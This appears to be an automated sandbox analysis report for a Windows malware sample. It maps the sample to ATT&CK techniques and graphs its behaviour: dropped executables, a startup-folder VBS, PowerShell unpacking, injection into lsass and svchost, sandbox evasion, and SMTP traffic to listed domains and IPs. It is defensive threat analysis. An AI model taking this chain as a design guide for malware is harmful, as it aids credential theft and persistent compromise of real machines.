                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting
                      Valid Accounts1
                      Native API
                      111
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts21
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      1
                      Access Token Manipulation
                      11
                      Deobfuscate/Decode Files or Information
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      713
                      Process Injection
                      2
                      Obfuscated Files or Information
                      Security Account Manager3
                      File and Directory Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      PowerShell
                      2
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      1
                      Software Packing
                      NTDS23
                      System Information Discovery
                      Distributed Component Object ModelInput Capture1
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                      Registry Run Keys / Startup Folder
                      1
                      DLL Side-Loading
                      LSA Secrets331
                      Security Software Discovery
                      SSHKeylogging111
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      File Deletion
                      Cached Domain Credentials2
                      Process Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                      Masquerading
                      DCSync31
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Modify Registry
                      Proc Filesystem1
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadow1
                      System Owner/User Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Access Token Manipulation
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd713
                      Process Injection
                      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1441717 Sample: vm6XYZzWOd.exe Startdate: 15/05/2024 Architecture: WINDOWS Score: 100 53 smtp.schule.at 2->53 55 mx1.hspherefilter.com 2->55 57 3 other IPs or domains 2->57 81 Found malware configuration 2->81 83 Antivirus detection for URL or domain 2->83 85 Multi AV Scanner detection for dropped file 2->85 87 15 other signatures 2->87 10 powershell.exe 2 15 2->10         started        13 vm6XYZzWOd.exe 1 8 2->13         started        signatures3 process4 file5 93 Writes to foreign memory regions 10->93 95 Modifies the context of a thread in another process (thread injection) 10->95 97 Found suspicious powershell code related to unpacking or dynamic code loading 10->97 99 Injects a PE file into a foreign processes 10->99 16 dllhost.exe 1 10->16         started        19 conhost.exe 10->19         started        45 C:\Users\user\AppData\...\$77Kaxhwswfup.exe, PE32 13->45 dropped 47 C:\Users\user\AppData\Local\Temp\$77a3a3b4, PE32 13->47 dropped 49 C:\Users\user\AppData\Local\Temp\$778e373e, PE32 13->49 dropped 51 C:\Users\user\AppData\...\$77Kaxhwswfup.vbs, ASCII 13->51 dropped 101 Drops VBS files to the startup folder 13->101 103 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->103 21 $778e373e 13->21         started        24 $77a3a3b4 1 13->24         started        signatures6 process7 dnsIp8 71 Injects code into the Windows Explorer (explorer.exe) 16->71 73 Contains functionality to inject code into remote processes 16->73 75 Writes to foreign memory regions 16->75 79 3 other signatures 16->79 26 lsass.exe 16->26 injected 29 svchost.exe 16->29 injected 31 svchost.exe 16->31 injected 34 29 other processes 16->34 59 zing.vn 120.138.68.152, 587 VINAGAME-AS-VNVNGCorporationVN Viet Nam 21->59 61 smtp.ciudad.com.ar 200.42.138.135, 587 TelecomArgentinaSAAR Argentina 21->61 63 101 other IPs or domains 21->63 77 Multi AV Scanner detection for dropped file 21->77 signatures9 process10 dnsIp11 105 Writes to foreign memory regions 26->105 36 wscript.exe 1 26->36         started        107 System process connects to network (likely due to code injection or exploit) 29->107 65 zing.vn 31->65 67 yomar.ma 31->67 69 420 other IPs or domains 31->69 signatures12 process13 signatures14 89 Windows Scripting host queries suspicious COM object (likely to drop second stage) 36->89 39 $77Kaxhwswfup.exe 36->39         started        process15 file16 43 C:\Users\user\AppData\Local\Temp\$77eec42d, PE32 39->43 dropped 91 Multi AV Scanner detection for dropped file 39->91 signatures17

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.